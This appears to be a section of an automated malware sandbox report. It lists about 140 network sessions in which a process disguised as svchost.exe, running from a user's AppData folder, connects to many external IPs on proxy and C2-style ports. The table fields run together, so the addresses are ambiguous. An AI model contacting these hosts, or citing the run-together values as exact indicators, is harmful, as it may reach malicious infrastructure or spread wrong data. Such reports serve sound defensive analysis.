                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4958192.168.2.549167103.146.137.5108156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4959192.168.2.54923445.61.188.1344449956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4960192.168.2.56402349.249.155.38056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4961192.168.2.564913184.105.182.254312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4962192.168.2.54920294.177.106.178232456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4963192.168.2.54920394.30.152.1728056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4964192.168.2.56284434.81.72.318056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4965192.168.2.564977162.241.6.973179456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4966192.168.2.549204120.79.101.0888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4967192.168.2.564905189.240.60.163909056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4968192.168.2.564808185.49.31.207808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4969192.168.2.56408734.87.84.1058056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4970192.168.2.54921543.128.146.421567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4971192.168.2.54924143.155.130.1821567343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4972192.168.2.549219213.252.245.221611656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4973192.168.2.549205138.36.150.16108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4974192.168.2.549206115.239.234.43730256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4975192.168.2.54920960.190.68.154730256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4976192.168.2.5655098.209.255.13312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4977192.168.2.54920864.43.89.102636156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4978192.168.2.54918413.234.24.116312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4979192.168.2.564930162.214.227.686043343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4980192.168.2.565453120.194.4.157544343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4981192.168.2.54925252.16.232.164312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4982192.168.2.54925846.17.63.166948043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4983192.168.2.564937189.240.60.171909043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4984192.168.2.54921494.131.64.945837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4985192.168.2.54925618.135.211.182312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4986192.168.2.564231162.241.158.2045298043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4987192.168.2.54926718.169.83.87108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4988192.168.2.564993115.96.208.124808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4989192.168.2.549196117.160.250.131889956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4990192.168.2.54926627.96.235.1718043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4991192.168.2.565318142.54.228.193414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4992192.168.2.54927118.135.133.1168043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4993192.168.2.549279129.213.150.2058056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4994192.168.2.565077174.138.114.2268056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4995192.168.2.564525125.227.225.157338956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4996192.168.2.564271103.35.190.18312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4997192.168.2.54927323.137.248.197888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4998192.168.2.549272185.158.114.142569743080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4999192.168.2.549276120.78.191.688056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5000192.168.2.54927814.103.24.20800056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5001192.168.2.564874110.93.227.28312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5002192.168.2.54929443.153.22.291000543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5003192.168.2.5642895.252.23.220312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5004192.168.2.56291552.80.19.207312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5005192.168.2.549298104.16.221.578056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5006192.168.2.564324177.131.29.213415343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5007192.168.2.549304172.67.25.2048056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5008192.168.2.565050190.111.209.207312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5009192.168.2.54935043.153.175.4344343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5010192.168.2.54935943.153.175.4344343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5011192.168.2.54936543.153.175.4344343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5012192.168.2.54936643.153.175.4344343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5013192.168.2.549166185.139.56.133414543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5014192.168.2.56505736.68.137.578056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5015192.168.2.54930934.49.208.2218043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5016192.168.2.54928651.15.247.931637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5017192.168.2.56437352.151.210.204900256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5018192.168.2.549287121.164.200.18108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5019192.168.2.54928545.138.87.238108043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5020192.168.2.54929395.164.89.123888843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5021192.168.2.565314107.175.37.1784302956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5022192.168.2.564284202.70.80.153567856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5023192.168.2.549302188.166.17.18888156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5024192.168.2.565285189.240.60.166909056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5025192.168.2.565237198.89.91.42567843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5026192.168.2.563081209.121.164.503114756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5027192.168.2.56538345.195.149.79108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5028192.168.2.549353104.21.194.198043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5029192.168.2.562966212.47.245.571637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5030192.168.2.565297217.182.129.103312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5031192.168.2.549314119.28.4.112999956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5032192.168.2.56526554.222.197.147808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5033192.168.2.564457192.252.216.81414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5034192.168.2.549303202.162.219.10108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5035192.168.2.565457104.236.0.1292216743080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5036192.168.2.56545192.204.134.38778543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5037192.168.2.549374142.54.228.193414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5038192.168.2.54932289.42.166.163808043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5039192.168.2.56309291.121.106.55444456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5040192.168.2.549315203.171.19.988056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5041192.168.2.565433173.249.7.118227656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5042192.168.2.5493005.44.42.1155838656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5043192.168.2.56541451.75.126.1502180356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5044192.168.2.563182147.124.212.312423056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5045192.168.2.563050115.74.157.191108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5046192.168.2.549354185.49.31.207808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5047192.168.2.565398218.57.210.186900256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5048192.168.2.563216172.93.111.2354320956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5049192.168.2.54937543.128.146.421567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5050192.168.2.56515947.91.65.23312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5051192.168.2.549331103.86.109.388056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5052192.168.2.54937818.135.211.182312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5053192.168.2.54938018.169.83.87108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5054192.168.2.565513195.164.138.34108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5055192.168.2.54938323.137.248.197888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5056192.168.2.549384125.227.225.157338956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5057192.168.2.549402104.18.251.2088056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5058192.168.2.565394102.134.181.142999956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5059192.168.2.56460945.5.118.4399956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5060192.168.2.54939498.162.25.23414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5061192.168.2.54938614.103.24.20800056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5062192.168.2.54938243.153.22.291000543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5063192.168.2.549360111.90.150.109108043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5064192.168.2.549236162.214.121.1733518356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5065192.168.2.549339134.209.105.209312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5066192.168.2.54933665.1.40.47108043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5067192.168.2.54937727.96.235.1718043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5068192.168.2.56548451.158.124.1671637943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5069192.168.2.54938118.135.133.1168043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5070192.168.2.54917751.15.223.121637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5071192.168.2.54939651.15.247.931637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5072192.168.2.549389208.109.13.935377856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5073192.168.2.54938834.49.208.2218043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5074192.168.2.549399121.164.200.18108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5075192.168.2.549385185.158.114.142569743080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5076192.168.2.549414192.252.216.81414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5077192.168.2.564629159.223.71.715121356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5078192.168.2.564622148.72.206.84253643080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5079192.168.2.54942145.138.87.238108043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5080192.168.2.564162121.204.179.70777756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5081192.168.2.564957174.77.111.196414543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5082192.168.2.549222171.244.140.1601508456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5083192.168.2.564984142.54.232.6414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5084192.168.2.549415188.166.17.18888156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5085192.168.2.549228220.194.189.144312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5086192.168.2.5494253.90.100.12312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5087192.168.2.56337251.75.126.150422856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5088192.168.2.56465916.162.211.90108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5089192.168.2.563343115.89.203.598056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5090192.168.2.549471104.16.108.1498056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5091192.168.2.549455138.68.60.8312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5092192.168.2.549429194.247.173.17808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5093192.168.2.549439145.239.199.2418056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5094192.168.2.54944751.158.125.1351637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5095192.168.2.549498104.16.106.658043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5096192.168.2.54944881.250.223.1268056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5097192.168.2.549508104.25.230.2528043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


